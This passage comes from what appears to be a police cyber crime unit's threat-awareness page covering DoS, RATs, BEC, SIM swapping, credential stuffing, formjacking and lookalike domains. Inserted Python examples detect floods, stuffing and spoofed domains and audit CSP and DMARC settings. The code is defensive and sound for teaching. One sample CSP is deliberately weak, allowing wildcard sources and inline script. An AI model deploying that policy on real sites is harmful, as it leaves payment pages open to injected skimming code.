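    lines = []
    for ip, n in requests_per_ip.items():
        for i in range(n):
            ts = datetime.fromtimestamp(start_epoch + i % 10, timezone.utc).strftime(TS_FORMAT)
            lines.append(f'{ip} - - [{ts}] "GET /login HTTP/1.1" 200 512')
    return lines


# Constructed scenarios (addresses from documentation ranges).
NORMAL_TRAFFIC = synthetic_log({"192.0.2.5": 5, "192.0.2.6": 3})
SINGLE_SOURCE_FLOOD = synthetic_log({"198.51.100.23": 80, "192.0.2.5": 3})
DISTRIBUTED_FLOOD = synthetic_log({f"203.0.113.{i}": 8 for i in range(1, 16)})


if __name__ == "__main__":
    for name, log in [("normal", NORMAL_TRAFFIC), ("single source", SINGLE_SOURCE_FLOOD),
                      ("distributed", DISTRIBUTED_FLOOD)]:
        print(name, "->", detect_flood(log))
```

    The 'dos' case can be handled at your own edge by blocking the few heavy sources; the 'ddos' case is the one where no single address is worth blocking and the upstream provider's mitigation, discussed in the advice below, is what matters.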

    Motivations for DoS attacks can be more varied than for other types of attack. As the effect is quite often immediately public, this is a favoured method of political activists/'hacktivists', or even disgruntled former employees looking to cause both PR and financial damage. Of course, criminals can also employ DoS attacks for financial gain, either through ransom demands or by operating a DoS service for hire.

    ADVICE

    Although there is technical advice which can help defend against DoS attacks, the majority of this may not be applicable to all, and not suitable to include in this format. More detailed guidance on DoS attacks can be found on the National Cyber Security Centre (NCSC) website outlined in the 'Useful Links' section below. However, we have included some brief points to consider below:

    • Prepare - ensure that you and your service providers are prepared to deal with an overload of their resources. Ask them to explain how they are prepared for these scenarios, and how they can mitigate the threat for your organisation.
    • Incident Response - understand what impact a DoS attack would have on your business and create an incident response plan. Think about who needs to be involved both internally and externally (e.g. 3rd party providers), and clearly define the roles and responsibilities for each. Think about having manual backup processes to rely on which can operate whilst the main services are down. Be thorough, and test your plan!
    • DoS attacks can be used as a smokescreen to distract from other attacks which have a different aim (e.g. data theft). Be aware of this, and monitor closely for other suspicious activity which could indicate additional attacks.
    • Action Fraud - if you are experiencing a live cyber attack, you can contact Action Fraud via telephone on 0300 123 2040, and follow the instructions. If it has been dealt with, then please also report the crime to Action Fraud, as every report will help law enforcement with intelligence building.

    USEFUL LINKS

    DoS guidance collection from NCSC
    Guidance to help organisations understand and mitigate against DoS attacks (from the NCSC at https://www.ncsc.gov.uk/guidance/denial-service-dos-guidance-collection).

    Connected Devices
    Lucky enough to get a new device for Christmas? Learn how to protect yourself, your family, finances, and connected devices with these tips (from Get Safe Online at https://www.getsafeonline.org/connectedchristmas/).

  • REMOTE ACCESS TROJAN (RAT)

    Remote Access Trojan (RAT)

    A tool used to enable criminals to connect to a victim's machine remotely and perform a number of unauthorised actions.

    A RAT gives attackers access to all of your files and to features of your computer such as the microphone and webcam, and can even use your computer to distribute malware to other machines.

    ADVICE

    Signs of a RAT on your system include a slow internet connection, unknown processes running on your systems, and files that have been modified/deleted/installed without permission. Here is some advice to protect against this type of attack:

    • Make sure that your operating systems on your computer, mobile & tablet are updated with the latest security patches.
    • Update your software with the latest security patches (e.g. Microsoft Office, Java, Flash, web browsers).
    • Install reliable antivirus and firewall programs, and keep these updated.
    • Don't click on any unusual links or attachments from emails, websites or social media.
    • Only download apps from sources that you trust.
    • Regularly back up your data.

    If you know or suspect you have been infected with a RAT, here's what to do:

    • Install security software from a trusted and reliable source.
    • Run a full security scan of your device and remove the threats by following the recommended steps from the security software.
    • Once you think that the infection has been removed, change the passwords for your online accounts and check your banking activity.
    • Report anything unusual to your bank and, as needed, to Action Fraud (0300 123 2040 / www.actionfraud.police.uk).
    • Learn how to protect your computer from future infections and avoid data loss by following the steps outlined above, and from handouts such as the NCSC's 'Small Business Guide'.

  • SEASON SCAMS

    Seasonal Scams

    This time of the year is a gold mine for cyber criminals, as shoppers are rushing to bag bargains, and employees are already mentally clocking out for the holidays.

    Fake websites and phishing emails promising truly unbelievable offers are rampant.

    So with this in mind, we've highlighted 7 tips below to keep you safe in the run up to Christmas and beyond!

    Stay up to date
    Installing the latest software and app updates is an essential part of protecting yourself. Updates aren't just for exciting new features, they usually contain really important security updates which can protect you against a number of attacks. Turn on automatic updates where you can!

    Use strong and separate passwords
    Secure your important accounts with a strong password, and do not reuse passwords across accounts. A huge number of the businesses in our investigations have suffered because of weak passwords. Do not use personal information in passwords. Instead, use a combination of random words, substituting certain letters for numbers/symbols.

    Turn on two-factor authentication (2FA), now!
    2FA is an extra layer of protection which double checks that you are who you say you are when logging in to accounts/applications. A 2FA service will send an extra code to the device that you register it to, meaning that unless cyber criminals have access to that device in some way, they won't be able to log in to your account. If possible, use an authenticator app rather than a text-based 2FA service, as this is generally more secure and defends against SIM swapping attacks.

    Use a password manager
    Having separate passwords is important, but it can be difficult to remember them all. You could consider using a password manager to solve this problem. Be aware that if you do use a password manager, you should make sure that your master password is very strong (see the above rules for creating a good password).

    Take extra care over links in emails and texts
    Always be wary of suspicious links; in fact, try to get out of the habit of following them if you can. For example, if an email references your account in any way and asks you to follow a link to do something, then go and log into your account separately (i.e. not using that link) to check activity there. The same goes for information on deals/coupons/vouchers: you should always look through other channels to verify information. Links could lead to fake websites designed to steal your information or money, and attachments could be malicious files.

    Only shop on sites that you trust, and report phishing emails to Action Fraud or hit the Spam or Report button within your email account.

    Don't give away too much information
    Normally online stores will ask for some information, e.g. your address and some bank details, to complete a purchase. If a store is asking for personal information which shouldn't be needed, such as where you went to school or your mother's maiden name, then this could be a red flag that a purchase is not legitimate.

    Also, if you can avoid it, don't create an account unless you plan to use a site in the future. You can usually checkout as a guest.

    When things don't feel right
    If something doesn't add up, then take five and take a second look at what you're being asked to give/do. If you're concerned that you may be at risk of cyber crime, then immediately close down your internet browser. Report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk) and contact your bank to seek advice. Whether you've been a victim of fraud will depend on how much information you've provided to the website. Keep an eye out for fraudulent activity on your accounts, and for any suspicious follow up activity through emails/texts/phone calls etc.

  • PHONE SCAM

    Phone Scam

    We have had a report that criminals are using our name in a phone scam. The report is that criminals are pretending to be from the South West Regional Cyber Crime Unit, and calling people using an automated message that says their internet has been compromised and will be shut down within 24 hours, and if they want to speak to the technical team they should 'press 1'.

    This is a scam: if you do receive a call like this, hang up the phone immediately.

    The South West Regional Cyber Crime Unit does not operate an automated call service. If we do contact you, we will provide you with a way of verifying that it is us, such as a collar number which you can then give to a 101 call handler if you need to confirm the caller's identity.

    If you are concerned that you have been a victim of this or any other type of cyber crime, report to Action Fraud on 0300 123 2040, or online at https://www.actionfraud.police.uk/

    For advice on protecting yourself against this type of scam, visit the Take Five campaign website at https://takefive-stopfraud.org.uk/advice/

  • BUSINESS EMAIL COMPROMISE (BEC)

    Business Email Compromise (BEC)

    A targeted form of phishing where criminals impersonate senior executives, or departmental authority figures, in order to get others to transfer funds or sensitive information to the imposter.

    BEC can happen in different ways, but generally speaking a criminal will either hack into an executive's email account, or they will 'spoof' the account (i.e. email from a lookalike account which is very similar to the original account). If an email has been spoofed, then email filters may be able to help prevent it from reaching employees.

    If an account has been hacked, then this is much harder to combat, as requests are coming from a legitimate account so detection software won't be much help. This type of BEC allows a criminal the opportunity to directly alter invoice attachments, and even set up rules which will redirect emails into folders to cover up their tracks.

  • SIM SWAPPING

    SIM SWAPPING

    Criminals will pose as an account holder and request a new SIM card. Once received, this allows them to effectively take control of the victim's phone. They can then access accounts which use passcodes sent to the victim's phone such as in SMS/call based two-factor authentication.

    Attackers will initially use other compromised information to bypass a company's security checks and request the new SIM. This information may be gained from leaked information on the dark web, phishing emails, or malicious software installed on user devices.

    ADVICE

    Be on the lookout for warning signs. Suddenly losing all service could indicate that a criminal has transferred your phone number to a different device. Receiving random authentication codes could also be a sign that someone is trying to breach your online accounts. Contact your phone company and financial institutions to mitigate any potential damage if you suspect any of the above.

    SMS-based two-factor authentication is better than nothing; however, it is better to use an authenticator app instead (e.g. Google Authenticator or Authy). Using these apps will protect accounts against SIM swap attacks.

    As mentioned, criminals may use other personal information to bypass security checks. Make sure that you are not exposing this sort of information on any of your online profiles. This information could be your phone number itself, or information such as your address / education / mother's maiden name / banking information etc.

    Many phone companies will allow you to put a unique PIN on your account. Enable this for another layer of security.

    Similarly, make sure that your bank accounts have as many security procedures enabled as possible. For example, in one of these cases, Voice ID prevented a criminal from draining a victim's bank account.

    Make sure that you know how to defend against Phishing attacks looking to compromise personal information used to bypass security checks - see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing

    Following on from the above point, don't download potentially malicious apps from untrusted sources; these could also steal your personal information to enable SIM swapping.

    Many accounts ask you to link your phone number to them. One alternative is to obtain and use a VoIP number (Voice over Internet Protocol), if possible. Since VoIP numbers operate over the internet, they are immune to being SIM swapped.

    If you are a victim of SIM Swapping, report it to Action Fraud https://www.actionfraud.police.uk/.

  • Credential Stuffing

    Criminals will automatically enter lists of compromised password/username pairs in order to gain unauthorised access to accounts.

    Once an account is taken over, an attacker can drain the account of any value it has, steal any associated personal information linked to the account, and use any of that information for further malicious purposes (e.g. sending spam emails).

    ADVICE

    Use separate passwords for all of your different accounts. This reduces the likelihood that passwords that have been compromised for one account can be used to gain access to other accounts. Avoid using your corporate network credentials for third-party sites.

    Create strong passwords: do NOT use personally linked information such as your pet's name; use the 'ThreeRandomWords' technique instead.

    If you think that your password may have been compromised, make sure to change it. Consider using resources such as 'haveibeenpwned.com' to check whether your passwords have been exposed in a data breach.

    Enable Two-factor/Multi-factor authentication on your accounts where possible. Do this, and it will make it much harder for criminals to gain access to your accounts.
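    The pattern described above, one source trying many different username/password pairs with almost all of them failing, is what a defender can look for in authentication logs. The detector below is an added example written for this page, not tooling from the Cyber Crime Unit or Action Fraud: the log line format, the IP addresses (RFC 5737 documentation ranges) and the usernames are constructed, and the thresholds (ten-minute window, five distinct usernames, 80% failure rate) are assumptions to tune against your own login volume.

```python
"""Credential-stuffing detector over authentication logs (added example).

Credential stuffing looks different from password guessing against one
account: a single source tries MANY different usernames, each only once or
twice, and almost all of them fail. The log format and the sample lines are
constructed for this example; swap parse_line() for your own log format.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed line format: "<ISO-8601 time> ip=<addr> user=<name> result=OK|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+ip=(?P<ip>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>OK|FAIL)$"
)


@dataclass
class Attempt:
    ts: datetime
    ip: str
    user: str
    ok: bool


def parse_line(line: str) -> Attempt | None:
    """Parse one log line; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return Attempt(ts, m["ip"], m["user"], m["result"] == "OK")


def detect_stuffing(lines, window=timedelta(minutes=10), min_users=5, min_fail_ratio=0.8):
    """Flag source IPs that, inside any `window`, tried at least `min_users`
    distinct usernames with a failure ratio of `min_fail_ratio` or more.

    Returns {ip: {"distinct_users", "attempts", "failures", "succeeded_users"}}
    computed over every attempt from that IP, so succeeded_users is the list
    of accounts that need a forced password reset and a 2FA check."""
    by_ip: dict[str, list[Attempt]] = defaultdict(list)
    for line in lines:
        attempt = parse_line(line)
        if attempt:
            by_ip[attempt.ip].append(attempt)

    findings = {}
    for ip, attempts in by_ip.items():
        attempts.sort(key=lambda a: a.ts)
        start = 0
        for end in range(len(attempts)):
            # slide the window so attempts[start:end+1] spans at most `window`
            while attempts[end].ts - attempts[start].ts > window:
                start += 1
            span = attempts[start:end + 1]
            users = {a.user for a in span}
            fails = sum(1 for a in span if not a.ok)
            if len(users) >= min_users and fails / len(span) >= min_fail_ratio:
                findings[ip] = {
                    "distinct_users": len({a.user for a in attempts}),
                    "attempts": len(attempts),
                    "failures": sum(1 for a in attempts if not a.ok),
                    "succeeded_users": sorted({a.user for a in attempts if a.ok}),
                }
                break
    return findings


# Constructed sample log: 203.0.113.7 sprays six accounts (one succeeds),
# 198.51.100.23 is one user mistyping their own password, 192.0.2.9 is normal.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z ip=203.0.113.7 user=alice result=FAIL
2024-03-01T10:00:02Z ip=203.0.113.7 user=bob result=FAIL
2024-03-01T10:00:03Z ip=198.51.100.23 user=erin result=FAIL
2024-03-01T10:00:04Z ip=203.0.113.7 user=carol result=FAIL
2024-03-01T10:00:05Z ip=203.0.113.7 user=dave result=OK
2024-03-01T10:00:06Z ip=198.51.100.23 user=erin result=FAIL
2024-03-01T10:00:07Z ip=203.0.113.7 user=erin result=FAIL
2024-03-01T10:00:08Z ip=203.0.113.7 user=frank result=FAIL
2024-03-01T10:00:09Z ip=198.51.100.23 user=erin result=FAIL
2024-03-01T10:00:10Z ip=198.51.100.23 user=erin result=OK
2024-03-01T10:00:11Z ip=192.0.2.9 user=grace result=OK
this line is not an auth event and is skipped
""".splitlines()

if __name__ == "__main__":
    for ip, summary in detect_stuffing(SAMPLE_LOG).items():
        print(ip, summary)
```

    The failure ratio matters as much as the username count: a shared office or mobile-carrier NAT address will also show many distinct users, but most of those logins succeed. Real stuffing runs are often slow and spread over many source addresses, so the window and thresholds are the knobs to tune, and a successful login from a flagged source is the signal to reset that account and confirm 2FA is on.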

  • Morrisons Appeal

    Morrisons loses appeal against data breach liability ruling

    The supermarket chain has lost its appeal against a High Court ruling that found it liable for a data leak by a former employee, underlining the importance of managing insider threats.

    The Court of Appeal ruled that Morrisons must pay compensation to 100,000 employees who were victims of the data breach by disgruntled employee Andrew Skelton, a senior internal auditor at the supermarket’s headquarters who deliberately leaked payroll information. The Appeal Court’s ruling underlines the fact that organisations are ultimately responsible for the personal data they hold.

    Morrisons is to appeal to the Supreme Court.

  • FORMJACKING

    Criminals will inject malicious code into a legitimate web page to steal a user's data. Typically this technique is used on check-out or payment forms on e-commerce sites.

    This type of attack was employed in the recent Ticketmaster and BA data breaches, but these are only a couple of examples of high profile incidents; it is very likely that a huge number of websites are currently at risk.

    Formjacking can be difficult to detect for both user and vendor. Web pages will look and function the same to the user, and the information entered into a form is still sent through to the vendor. It's only in the background that the attacker is copying the data.

    FOR USERS

    Training and Awareness - in some cases, formjacking requires a user to click on a malicious link or visit a malicious website which will prompt them to fill in sensitive data. It's important that you and your colleagues can recognise when attackers are employing this tactic. Make sure to check that the URLs of websites in the address bar are what they should be (e.g. look for misspellings, numbers instead of letters, irregular domain endings).

    Ensure that your firewalls have been correctly configured, so that known suspicious websites are not accessible. If you are not responsible for this, ask your IT manager/provider to confirm this has been done.

    Where a legitimate website has been compromised, this can be very difficult to protect against. Formjacking can be a type of Supply Chain Attack, in that criminals can target companies through the web services that they use. This should serve as a reminder to always do your due diligence when deciding which online services you use, and how you use them. Think about what security measures they have in place, e.g. are they Cyber Essentials certified? How would they notify/work with you in the event of a cyber incident?

    FOR DEVELOPERS / IT ADMINS

    Always integrate security into the development process. Scan internal codebases at different stages of the development cycle for anomalies.

    Access Controls - ensure that only employees who need to have the ability to edit important source code can do so.

    Strong Content Security Policies - control which domains are allowed to communicate with your website, and how. If done correctly, CSPs can prevent malicious code from sending compromised data to other servers.
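    To make the CSP point concrete: injected formjacking code still has to get the captured card details off the page, typically by a background request, an image/beacon request, or re-pointing the form's submit target. The checker below is an added example, not code from this page or from CiSP; it parses a CSP header and reports which of those channels a payment page leaves open. The weak and strong policies, the payment hostnames (`js.payments.example`, `api.payments.example`) and the checker itself are constructed; the directive names and the fallback rules are standard CSP.

```python
"""Content Security Policy audit for a payment page (added example).

Data can leave a page through connect-src (fetch/XHR/beacon), form-action
(where the form may POST), img-src (data smuggled in an image URL) and
script-src (which scripts run at all). A policy that pins each of these to
known origins denies a formjacking script its exit routes.
"""
from __future__ import annotations

EXFIL_DIRECTIVES = ("connect-src", "form-action", "img-src", "script-src")
# Source expressions that amount to "anywhere": flag them on a payment page.
BROAD_SOURCES = {"*", "http:", "https:", "data:", "blob:"}


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [sources]}.
    If a directive is repeated, the first occurrence wins (CSP ignores later duplicates)."""
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def effective_sources(policy: dict[str, list[str]], directive: str) -> list[str] | None:
    """Resolve the fallback chain: fetch directives fall back to default-src,
    but form-action does NOT, so it is unrestricted unless set explicitly."""
    if directive in policy:
        return policy[directive]
    if directive != "form-action" and "default-src" in policy:
        return policy["default-src"]
    return None


def audit_csp(header: str) -> list[str]:
    """Return human-readable findings; an empty list means every exfil channel is pinned."""
    policy = parse_csp(header)
    findings = []
    for directive in EXFIL_DIRECTIVES:
        sources = effective_sources(policy, directive)
        if sources is None:
            findings.append(f"{directive}: not set, any origin allowed")
            continue
        broad = BROAD_SOURCES.intersection(s.lower() for s in sources)
        if broad:
            findings.append(f"{directive}: allows {', '.join(sorted(broad))}")
        if directive == "script-src" and any(
            s.lower() in ("'unsafe-inline'", "'unsafe-eval'") for s in sources
        ):
            findings.append("script-src: 'unsafe-inline'/'unsafe-eval' permits injected inline script")
    return findings


# Constructed policies: a typical "it works" header versus a pinned one.
WEAK_CSP = "default-src * 'unsafe-inline'; script-src * 'unsafe-inline'"
STRONG_CSP = (
    "default-src 'self'; "
    "script-src 'self' https://js.payments.example; "
    "connect-src 'self' https://api.payments.example; "
    "img-src 'self'; "
    "form-action 'self'; "
    "frame-ancestors 'none'"
)

if __name__ == "__main__":
    for name, header in (("weak", WEAK_CSP), ("strong", STRONG_CSP)):
        print(name, audit_csp(header) or ["no findings"])
```

    The detail worth remembering is that `form-action` has no fallback to `default-src`: a policy that only sets `default-src 'self'` still lets an injected script re-point the checkout form at another host. Run the audit in report-only mode first (the `Content-Security-Policy-Report-Only` header) so legitimate payment-provider scripts are allowlisted before the policy is enforced.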

    Check CiSP! - the Cyber Security Information Sharing Partnership is regularly updated with example code and other Indicators of Compromise (IOCs) to help identify these types of threats.

  • LEAKS

    It’s a common theme in the news: ‘Company X has had a security breach and Y customer details have been leaked’.

    But what does this actually mean?

    Cyber Crime is big business and it is believed that through 2017 Cyber Crime may have cost the world around $600 billion. For many of these criminals it is their day job and your data are their pay cheques.

    Among many other methods to obtain money, one tactic is for an attacker to infiltrate a business computer network and find personal data stored on their systems. This could be names, email addresses, credit card numbers and details, passwords etc. This information is then uploaded to marketplaces on the Dark Web for other people to buy.


    Taken from Experian, below is an estimate of how much your data can be purchased for on the Dark Web:

    [Image: Experian's estimate of Dark Web prices for personal data, not reproduced here]

    People purchasing this information can buy specific pieces of information such as a person’s passport details or bulk data with various categories from many different sources.

    Other attackers can then use this information to create further attacks. For example, someone could find your full name and a password that was used on a breached website. They could then look online for other accounts under the same person’s name, e.g. Facebook, LinkedIn, online banking etc., and try the leaked password on those sites.

    How many of us use the same password for multiple site logins?

    Therefore, if your data has been leaked and you have been notified of this, you should take all steps necessary to prevent yourself being the next victim.

    To find out if your password has been leaked please visit https://haveibeenpwned.com, where you can check your email addresses to see if they are associated with any breaches and also find out what data was leaked.

    For any further information please do not hesitate to contact us!

  • URL SPOOFING

    A criminal will create a fake URL (website) which looks like a legitimate and secure website, but is actually set up to steal sensitive information for malicious purposes.

    Criminals will attempt to lure users into visiting the fake URL via phishing emails/SMS/social media. Typically, attackers have targeted financial services for a direct profit gain, however they also employ this tactic in many other scenarios.

    For example, recently universities in the UK have been targeted by overseas criminal groups. Attackers are using fake phishing websites which then redirect users to real login screens. By doing this, the attackers can then record any login details used, giving them access to online libraries which may include valuable intellectual property.

    ADVICE

    Make certain that you know how to defend against phishing. For detailed guidance, check out the entry on phishing from the NCSC's Small Business Guide (https://www.ncsc.gov.uk/guidance/avoiding-phishing-attacks).

    Always check that the URL of the website you are being asked to log into is what you are expecting (look for misspellings or variations of phrasing, and misleading domain endings e.g. 'orguk.com'). Other signs include a website not behaving in a typical way (odd pop-ups, incorrect links, inconsistent content).

    Protect your devices by ensuring that all software is frequently being patched and updated. These attacks exploit vulnerabilities, so make sure to use the latest versions of any software you have, and apply security patches promptly.

    Ensure that firewalls have been correctly configured to reduce the ability to visit malicious websites. If you are not responsible for this, ask your IT manager/provider to confirm this has been done.

    Install and run antivirus software, and make sure that it is updated regularly.

  • WATERING HOLE ATTACK

    A criminal will identify a website that is frequented by users inside a target organisation, compromise that website, and use it to distribute malicious software to the users.

    Watering hole attacks are an example of a supply chain attack, whereby criminals target websites thought to be regularly used by organisations of interest to them. These types of attacks are becoming increasingly successful with the increased use of third party web based services.

    A victim may be unaware that malware has been downloaded during their session; this is known as a 'drive-by' attack. Alternatively, as they are usually on a trusted site, they may consciously download a file without knowing what it really contains.

    Typically, the malware used will be a Remote Access Trojan, which will enable the attacker to gain remote access to a target system and then perform a number of functions, e.g. reconnaissance, exfiltrating data, or distributing other malware.

    ADVICE

    Watering Hole attacks are a type of Supply Chain attack, so it's important that both your new and existing suppliers are evaluated for their cyber risk. Consider contractual clauses focused on security, and challenge your suppliers to practise and develop processes for reacting to compromise or data breaches. Note: Cyber Essentials accreditation is a good indicator of a supplier's reputation.

    Protect your devices and network by ensuring that everything is frequently being patched and updated. Watering Hole attacks exploit bugs and vulnerabilities, so it is crucial that you are using the latest versions of any software you have, and apply security patches promptly.

    Network Security - ensure that your firewalls and any other security products have been correctly configured to monitor and filter web traffic effectively. Monitoring your network for abnormalities is especially key to detecting malicious behaviour. If you are not responsible for this, ask your IT manager/provider to confirm this is being done.

  • INSIDER THREAT

    Threats that result from the actions of an employee, former employee, or stakeholder. Insider threats can be intentional or unintentional.

    Significant damage can be caused to a company by anyone who has, or at one time had, access to confidential or proprietary information. Insiders have knowledge and understanding of internal processes and structures, making it easier for them to cause incidents. As they already have access to company systems and premises, it can also be much harder for those incidents to be detected; this is a good example of why a company cannot rely solely on security software to detect threats.

    If an insider is actively seeking to harm a business, then they may use their login credentials to steal customer data or Intellectual Property, sabotage data or applications, or even expose sensitive email conversations which could cause reputational damage. These types of actors could be acting on personal motives (financial, emotional, or political), for a competitor, or under direction from other malicious parties e.g. extortion attempts.

    The unintentional insider threat can be just as damaging. Although there may be no intent to do harm, employees often make mistakes, they can have their accounts compromised, and they can also be socially engineered by attackers to enable malicious actions. Unfortunately, the majority of security incidents can be traced back to human error in some capacity.

    ADVICE

    Implement good hiring policies - make sure staff are vetted to a suitable degree. This should extend to third-party vendors, sub-contractors and other partners.

    Review firing policies - this includes revoking user access to systems before employees are informed that they are being let go, escorting them off premises, and changing any login credentials that they might know of.

    Use the principle of 'Least Privilege', which maintains that employees should only have access to data which they need for their role. Reducing the number of privileged staff means fewer staff who can conduct malicious activity, fewer accounts to be hacked, and fewer people to make high profile mistakes. With this in mind, it's important to update employee privileges when they change jobs, so they don't retain access to unnecessary and sensitive data.

    Segregation of duties - although you should reduce the number of privileged staff as outlined above, it's also good practice to make sure that business sensitive processes require more than one person to complete them. This can reduce fraud, error, and overreliance on single employees.

    Monitor user activity. There are software solutions which monitor work sessions and network performance to detect abnormal user behaviour; this can be an option for organisations who have the budget and need to put this in place. Alternatively, if this isn't a suitable option, use the information available to you to observe how staff operate. It may be good practice to analyse business performance at certain times, e.g. when certain employees are away on leave, or during busy financial periods.

    Implement regular cyber security training - this should cover all manner of threats, including social engineering and associated attacks such as Phishing/Spear Phishing/Business Email Compromise/CEO Fraud. Build a healthy working environment which encourages open communication. Not only can this reduce the likelihood of employees becoming malcontent, but staff will be more ready to discuss any security concerns they might have around their own work and that of others.

  • BUSINESS EMAIL COMPROMISE (BEC)

    A type of phishing attack where criminals impersonate senior executives, or departmental authority figures, in order to socially engineer victims into sending financial or other sensitive information to the attacker.

    There are various methods involved in BEC. One method attackers may employ is to use malicious software kits to gain access to a company's webmail exchange service. Once they have this access, they can then intercept invoices and alter payment details, or pose as senior employees to authorise transfers to fraudulent accounts.

    Other methods include designing an email to look as authentic as possible. For example, a fraudster may register a domain which looks very similar to a pre-existing legitimate one, and attempt to solicit fraud using associated email accounts. This was raised in a recent Action Fraud report regarding university suppliers. The report highlighted how attackers are registering domains that are similar to genuine university domains, such as xxxxacu-uk.org, xxxxuk-ac.org and xxxacu.co.uk.

    These domains are used to contact suppliers and order high value goods such as IT equipment and pharmaceutical chemicals in the university’s name. The purchase order typically instructs delivery to an address, which may or may not be affiliated with the university. The items are then received by the criminals before being moved on, however no payment is received by the supplier.
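    The lookalike domains above, together with the "check the URL for misspellings, numbers instead of letters and odd domain endings" advice in the URL Spoofing and Formjacking sections, can be turned into a triage check that a mail gateway rule or an analyst can run over sender domains and links before a purchase order is acted on. The following is an added example, not a tool from the Cyber Crime Unit or Action Fraud: the trusted domains (`acme-uni.ac.uk`, `bigbank.co.uk`), the candidate domains, the confusable-character table and the four-entry suffix list are all constructed assumptions, and a production version should use the full Public Suffix List.

```python
"""Lookalike-domain triage against a trusted allowlist (added example).

Catches the tricks the text describes: misspellings, digits or letter pairs
swapped for similar-looking ones, and trusted labels glued together under a
different ending ('acu-uk.org' standing in for '.ac.uk').
"""
from __future__ import annotations

# Simplified public-suffix data (assumption; use the real Public Suffix List in production).
TWO_LABEL_SUFFIXES = {"co.uk", "ac.uk", "org.uk", "gov.uk"}

# Substitutions commonly used to imitate a name (assumption; extend as needed).
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t")]


def normalise(domain: str) -> str:
    """Lower-case, drop dots and hyphens, fold confusable characters to their targets."""
    s = domain.lower().strip(".").replace(".", "").replace("-", "")
    for lookalike, target in CONFUSABLES:
        s = s.replace(lookalike, target)
    return s


def brand_label(domain: str) -> str:
    """The label just below the public suffix: 'bigbank' for bigbank.co.uk."""
    labels = domain.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return labels[-3]
    return labels[-2] if len(labels) >= 2 else labels[0]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (single-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(candidate: str, trusted: str) -> str | None:
    """Why `candidate` resembles `trusted`; None if identical or unrelated."""
    cand, trust = candidate.lower().strip("."), trusted.lower().strip(".")
    if cand == trust:
        return None
    n_cand, n_trust = normalise(cand), normalise(trust)
    if n_cand == n_trust:
        return "confusable characters or punctuation only"
    if n_cand.startswith(n_trust) or n_cand.endswith(n_trust):
        return "trusted name embedded under a different ending"
    if edit_distance(n_cand, n_trust) <= 2:
        return "misspelling within two edits"
    if brand_label(trust) in brand_label(cand):
        return "trusted brand label inside another name"
    return None


def triage(candidates: list[str], trusted: list[str]) -> dict[str, str]:
    """Map each suspicious candidate to its reason and the trusted domain it mimics."""
    findings: dict[str, str] = {}
    for cand in candidates:
        for trust in trusted:
            reason = lookalike_reason(cand, trust)
            if reason:
                findings[cand] = f"{reason} (mimics {trust})"
                break
    return findings


# Constructed sample data: two trusted domains and six sender/link domains to triage.
TRUSTED = ["acme-uni.ac.uk", "bigbank.co.uk"]
CANDIDATES = [
    "acme-uni.ac.uk",        # genuine
    "acmeuniac-uk.org",      # labels glued under .org, as in the university report
    "acrne-uni.ac.uk",       # 'rn' imitating 'm'
    "bigbank-secure.co.uk",  # brand plus a reassuring word
    "bigbnak.co.uk",         # transposed letters
    "news.co.uk",            # unrelated
]

if __name__ == "__main__":
    for domain, verdict in triage(CANDIDATES, TRUSTED).items():
        print(f"{domain}: {verdict}")
```

    A hit is a reason to apply steps 3 and 4 of the advice below (verify through a known-good contact), not proof of fraud: the brand-label rule in particular will flag legitimate names that happen to contain a trusted one, which is the right trade-off for triage.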

     

    ADVICE

    1. Educate and train staff to be aware of and recognise BEC. Consider running simulated BEC/phishing exercises.
    2. Agree secure processes between employees internally and externally for your organisation to confirm certain purchases. Consider segregating duties, and make certain that employees know their responsibilities with regard to these processes.
    3. Ensure that you verify and corroborate all order requests from new customers. Use telephone numbers or email addresses found on the retailer's website; do not use the details given in the suspicious email for verification purposes.
    4. If the order request is from a new contact at an organisation that’s an existing customer, verify the request through an established contact to make sure it is legitimate.
    5. Check any correspondence and documents for inconsistencies in spelling, grammar and content – this can be a sign that fraudsters are at work.
    6. Install and frequently update antivirus and anti-malware software to protect against malicious software.
    7. Consider employing DMARC - a free email authentication solution from the Global Cyber Alliance (online setup can be found at https://dmarc.globalcyberalliance.org)
    8. Every Report Matters – if you have been a victim of fraud or cyber crime, report it to Action Fraud (either online at www.actionfraud.police.uk or call 0300 123 2040).
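    For point 7, an added example (not from this page, the Global Cyber Alliance or Action Fraud) that reads the DMARC TXT record an organisation publishes at `_dmarc.<domain>` and says whether it actually instructs receiving mail servers to reject spoofed mail, or only asks them to report it. The sample records and the `example.test` reporting mailbox are constructed; the tag names (`v`, `p`, `sp`, `pct`, `rua`) are the standard DMARC ones.

```python
"""DMARC record checker (added example).

Many organisations 'have DMARC' but publish p=none, which delivers spoofed mail
and merely sends a report. This checker classifies a record as missing,
invalid, monitor-only, partial or enforced, with the reasons.
"""
from __future__ import annotations


def parse_dmarc(record: str) -> dict[str, str]:
    """Split 'v=DMARC1; p=reject; rua=mailto:...' into a {tag: value} dict."""
    tags: dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str | None) -> tuple[str, list[str]]:
    """Return (level, notes); level is 'missing', 'invalid', 'monitor-only',
    'partial' or 'enforced'."""
    if not record or not record.strip():
        return "missing", ["no DMARC record: receivers apply no policy to spoofed mail"]
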